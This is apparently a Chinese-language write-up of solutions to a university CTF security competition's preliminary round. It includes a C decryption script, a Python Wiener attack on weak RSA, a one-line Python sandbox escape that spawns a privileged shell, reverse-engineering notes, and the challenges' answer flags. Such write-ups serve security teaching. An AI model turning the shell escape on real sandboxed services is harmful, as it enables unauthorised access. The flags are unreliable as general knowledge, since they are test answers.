[WP]全国大学生信息安全竞赛--创新实践能力赛 初赛
1.签到
flag{同舟共济扬帆起,乘风破浪万里航。}
2.the_best_ctf_game
打开看到flag
flag{65e02f26-0d6e-463f-bc63-2df733e47fbe}
3.电脑被黑
解压文件,在/misc01/ 中发现ELF文件demo,加密的文件fakeflag.txt
demo是一个加密程序,对其编写解密脚本,解密fakeflag后发现并不是需要的flag
分析加密流程,'flag'加密出来对应0x44 ,0x2A ,0x03 ,0xE5 ,0x29 ,..
disk_dump中搜索,第一串匹配的对应fakeflag加密获得的密文
第二串匹配的对应真实flag加密获得的密文
解密脚本
#include<stdio.h>
#include<iostream>
#include<string>
using namespace std;
int main(){
// int fakeencode[]={0x44 ,0x2A ,0x03 ,0xE5 ,0x29 ,0xBC ,0x96 ,0x7F,0x55 ,0x35 ,0x1B,0xE1,0xDD ,0xA4 ,0x85 ,0xA2 ,0x1D ,0x0E ,0xEF ,0xD0 ,0xA7 ,0x6B};
int encode[]={0x44,0x2A ,0x03 ,0xE5 ,0x29,0xA3 ,0xAF ,0x62 ,0x05 ,0x31 ,0x4E ,0xF3 ,0xD6 ,0xEB ,0x90 ,0x66 ,0x24 ,0x5C ,0xB7 ,0x92 ,0xF6 ,0xD7 ,0x4D ,0x0B ,0x6A ,0x41 ,0xA3 ,0x85 ,0xEF ,0x90 ,0x5A ,0x7E ,0x5B ,0xEC ,0xC1 ,0xF0 ,0xD4 ,0x61 ,0x12 ,0x12 ,0x45 ,0xEB};
int v4=34;
int v5=0;
for(int i=0;i<45;i++){
int j=0;
for(j;j<=127;j++){
//printf("%x ",v4^(v5+j));
if(((v4^(v5+j))%0x100)==encode[i]){
printf("%c",j);
v4+=34;
v5=(v5+2) & 0xf;
//printf("\n\n");
break;
}
}
//printf("\n");
}//
}flag{e5d7c4ed-b8f6-4417-8317-b809fc26c047}
8.bd
wienerAttack攻击
import gmpy2
import time
def continuedFra(x, y):
cF = []
while y:
cF += [x / y]
x, y = y, x % y
return cF
def Simplify(ctnf):
numerator = 0
denominator = 1
for x in ctnf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return (numerator, denominator)
def calculateFrac(x, y):
cF = continuedFra(x, y)
cF = map(Simplify, (cF[0:i] for i in xrange(1, len(cF))))
return cF
def solve_pq(a, b, c):
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) / (2 * a), (-b - par) / (2 * a)
def wienerAttack(e, n):
for (d, k) in calculateFrac(e, n):
if k == 0: continue
if (e * d - 1) % k != 0: continue
phi = (e * d - 1) / k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return abs(int(p)), abs(int(q))
print 'not find!'
time.clock()
n = 86966590627372918010571457840724456774194080910694231109811773050866217415975647358784246153710824794652840306389428729923771431340699346354646708396564203957270393882105042714920060055401541794748437242707186192941546185666953574082803056612193004258064074902605834799171191314001030749992715155125694272289
e = 46867417013414476511855705167486515292101865210840925173161828985833867821644239088991107524584028941183216735115986313719966458608881689802377181633111389920813814350964315420422257050287517851213109465823444767895817372377616723406116946259672358254060231210263961445286931270444042869857616609048537240249
c = 37625098109081701774571613785279343908814425141123915351527903477451570893536663171806089364574293449414561630485312247061686191366669404389142347972565020570877175992098033759403318443705791866939363061966538210758611679849037990315161035649389943256526167843576617469134413191950908582922902210791377220066
p, q = wienerAttack(e, n)
print '[+]Found!'
print ' [-]p =',p
print ' [-]q =',q
print ' [-]n =',p*q
d = gmpy2.invert(e,(p-1)*(q-1))
print ' [-]d =', d
print ' [-]m is:' + '{:x}'.format(pow(c,d,n)).decode('hex')
print '\n[!]Timer:', round(time.clock(),2), 's'
print '[!]All Done!'
flag{d3752538-90d0-c373-cfef-9247d3e16848}
10.babyjsc
直接提权
__import__('os').execl('/bin/sh/','sh','-p')
flag{c4e39be1-666e-43c4-bf9c-3b44bd280275}
15.z3
动态调试得到dst值
然后通过矩阵运算解42元1次线性方程组得到ascii码,这里发现可以七行一组分开解,解码后得到答案
flag{7e171d43-63b9-4e18-990e-6e14c2afe648}
16.hyperthreading
加密完后与内置变量进行比较,发现字符加密后的密文和字符所在位置无关,因此可以构造彩虹表
输入‘abcdef123456789-{}’进行加密
nop掉两个跳转避免异常退出
00361306 |. 3A88 50213600 |cmp cl,byte ptr ds:[eax+0x362150] 下断并监控cl与[eax+0x362150]的值,其中一边是输入的字符对应的加密结果,一边是加密后结果的对比
字符对应加密后得到的彩虹表
比较的密文,按表替换解密
几个字符没有替换到,不过flag括号里的内容已经完整了
flag{a959951b-76ca-4784-add7-93583251ca92}
